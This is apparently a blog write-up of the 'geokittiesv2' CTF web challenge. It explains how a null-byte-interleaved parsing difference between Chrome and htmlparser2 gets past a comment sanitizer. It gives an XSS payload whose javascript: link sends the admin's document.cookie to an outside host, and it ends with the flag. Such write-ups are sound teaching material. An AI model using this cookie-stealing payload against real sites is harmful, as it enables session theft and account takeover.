Overview

Problem page:
https://geokittiesv2.web.ctfcompetition.com/

Copy of source code:
https://gist.github.com/tyage/cac08c8e17b90b840fb22cb434cff127

It receives comment, then admin checks it and clicks a link.

The comment is validated by using htmlparser2.

Allowed tags are: p, a, b, img, br, i
Invalid attributes: on(.*)= and href=javascript:...

Solution

What we should do is find the differences in parsing between Google Chrome and htmlparser2.

After some time, I realize that when input is utf-16 string, Chrome parses it as utf-16 string but htmlparser2 does not.

For example, the html below is parsed as html element \x00a\x00 in htmlparser2.

x00<x00ax00>x00<x00/x00ax00>x00

<\x00a\x00> is not a valid tag, so we should create a valid html link like below.

x00<a x00>x00<x00/x00ax00>x00

Now, htmlparser2 recognize a html tag but chrome does not recognize it as html element.

So we can construct an valid html <a href=javascript:....

'x00<a x00' + "<a href='javascript:location.href=`//tyage.net/`+document.cookie'>".split('').join('x00') + '</a>'

Finally, admin gives us a flag: CTF{i_HoPe_YoU_fOunD_tHe_IntEndeD_SolUTioN_tHis_Time}

カテゴリー: CTF

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

関連記事

CTF

DEF CON CTF 2014

チームbinjaのパーカー運搬係として参加していました 関連